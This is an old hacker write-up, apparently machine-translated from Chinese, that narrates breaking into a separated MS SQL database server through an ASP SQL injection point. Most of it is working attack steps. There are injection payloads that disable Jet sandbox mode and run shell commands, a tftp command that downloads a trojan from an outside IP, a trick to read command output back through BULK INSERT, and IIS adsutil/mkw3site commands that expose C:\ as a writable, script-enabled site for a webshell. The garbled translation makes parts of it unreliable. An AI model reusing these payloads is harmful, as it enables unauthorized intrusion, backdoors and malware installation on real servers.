A clever Hacking_ vulnerability study

Remember a clever hacking~
by Netpatch
That day, is looking at the material, the friend lost a URL to come over, said is the SA injects the point, but the database and the web separation, has done for a long time not to fix.
I listen, SA injection point, should be very easy to say, so very casually said, OK, no problem, and so will give the result ~
By hand, the approximate point of the SA injection is indeed. Judging process I will not write, the wonderful place of course to stay behind
Nbsi The big knife started. First try to restore the xp_cmdshell and sp_OACreate two extended storage, and then execute a command with two extended storage after recovery, but judging from the echo result,
The command did not execute successfully. It then restores the Xp_servicecontrol extended store, and as the extended store does not echo back, I randomly echo a file to a specified directory
The directory is then listed with the function of the column directory, but no written files are found. Thought, should be the administrator of those several commonly used hacking extended storage to X.
I don't know if the xp_regwrite extended storage has been x yet. So, the sandbox mode is turned on manually
Asp?idx=32;exec Master. Xp_regwrite ' HKEY_LOCAL_MACHINE ', ' Software\microsoft\jet\4.0\engines ', ' SandboxMode ', ' REG_DWORD ', 0;--
Then try to echo a file in sandbox mode to the specified directory.
Asp?idx=32 and 0<> (SELECT * FROM OPENROWSET (' microsoft.jet.oledb.4.0 ', ';d atabase=c:\winnt\system32\ias\ Ias.mdb ', ' Select Shell ("cmd/c Echo XX
>c:\xxx\xxx.txt "))--
Then use the function of the column directory to list the directory, and found the echo command successful execution! HOHO, fortunately, the administrator did not store this extension to X.
With extended storage with executable commands, there is a glimmer of hope. So I thought of going straight up with TFTP. Performing tftp-i IP get muma.exe c:\muma.exe found little reflection.
Guessing may be limited by the administrator or Del. So wrote a word download vbs, after execution, for a while did not find our horses, do not he can not access the extranet?
So I executed the ipcongfig command again, and Echo to the np.tmp temporary file. But we do not see the content of ECHO, how can we get the IP of the database server? Hey, think about it, why is he nbsi back?
？ We can do that, too.
asp?idx=32; CREATE TABLE [Np_icehack] (resulttxt nvarchar (1024) NULL)--//create a table with echo content
asp?idx=32 BULK Insert [np_icehack] from ' np.tmp ' with (keepnulls), insert into [Np_icehack] values (' g_over '); Alter Table [np_icehack] Add ID int
Not NULL IDENTITY (1,1)-//-Writes the contents of the temporary file np.tmp to the Np_icehack table as a backup
Then use the NBSI to run the table directly. After a while, the lovely IP on the float now in front of me. Then he nmap, a scan. But the scan turned out to be a bit unexpected. I opened a 80.
is the database not separate? Ping the domain name of its IP and the resulting database IP is not the same. No matter 3,721, the first visit to talk about. IP access immediately.
Found a blank, strange! And then randomly hit the previous directory, or blank. dumbfounded. This is ... This port is based on the nmap of IIS 5.0 Ah, false positives?
Suddenly think, try to know. How do you try it? Hey, I executed the net stop W3SVC command (stopping the entire Web service) in sandbox mode. Again visit 801 to see. YES, I can't access it. Even that depressing emptiness.
The white page also disappears. It looks like there's a chance, so I'm going to execute the net start w3svc command (start the entire Web service). Again visit 801 to see, no Web site is configured in this address.
Ah, there are bound domain names, it is not possible to do a virtual directory. Then execute the following command, query several site configuration (1 in turn to add up to see the configuration of other sites)
CMD/C Cscript.exe C:\Inetpub\AdminScripts\adsutil.vbs Get w3svc/1/serverbindings
View the bonding port for the first virtual Web site. The W3SVC/1 here is iis:\. LOCALHOSTW3SVC/1 's shorthand, and ServerBindings is his property.
Or use NBSI column, column to 3 o'clock, found that it bound a domain name, so execute the following command, add virtual directory
Cscript.exe c:\Inetpub\AdminScripts\adsutil.vbs CREATE w3svc/3/root/np "IIsWebVirtualDir"
Cscript.exe c:\Inetpub\AdminScripts\adsutil.vbs SET W3svc/3/root/np/path "C:\":
Cscript.exe c:\Inetpub\AdminScripts\adsutil.vbs SET W3svc/3/root/np/accessread 1
Cscript.exe c:\Inetpub\AdminScripts\adsutil.vbs SET w3svc/3/root/np/accesswrite 1
Cscript.exe c:\Inetpub\AdminScripts\adsutil.vbs SET W3svc/3/root/np/accessscript 1
Cscript.exe c:\Inetpub\AdminScripts\adsutil.vbs SET w3svc/3/root/np/enabledirbrowsing 1
Cscript.exe c:\Inetpub\AdminScripts\adsutil.vbs SET W3svc/3/root/np/accesssource 1
Add happy to visit that domain name www.xxx.com/np/results found or www.xxx.com content, suspicion did not add success, so casually visited a directory, found or www.xxx.com content
Is it all forwarded to the www.xxx.com??? So the local platform test ING. The discovery was, as expected, forwarded.
Never, ever. It's like this. After a period of thinking, the brain turned, thinking: you do not let me visit this station, line. I promise you, I build a station to see you turn. Hum ~
So immediately execute the following command
CMD/C cscript c:\Inetpub\AdminScripts\mkw3site.vbs-r "c:\"-t "test"-C "LocalHost"-O ""-H "netpatch.xx.com"
Bind your domain name to the database server IP. Visit netpatch.xx.com HOHO again, finally can.
Then immediately echo a word immediately to the end of this hacing trip.
BTW: In fact, in this hacking encountered a lot of problems, but also looked at a lot of relevant information, lap platform test n times before testing OK. And not as smooth as the article.
The difficulty is that the other party only opened 80 and forwarded the only Web, and could not access the extranet.
___ by Netpatch www.icehack.com & [P.t.u]
If you want to reprint, please keep the article intact. Thank you for your cooperation!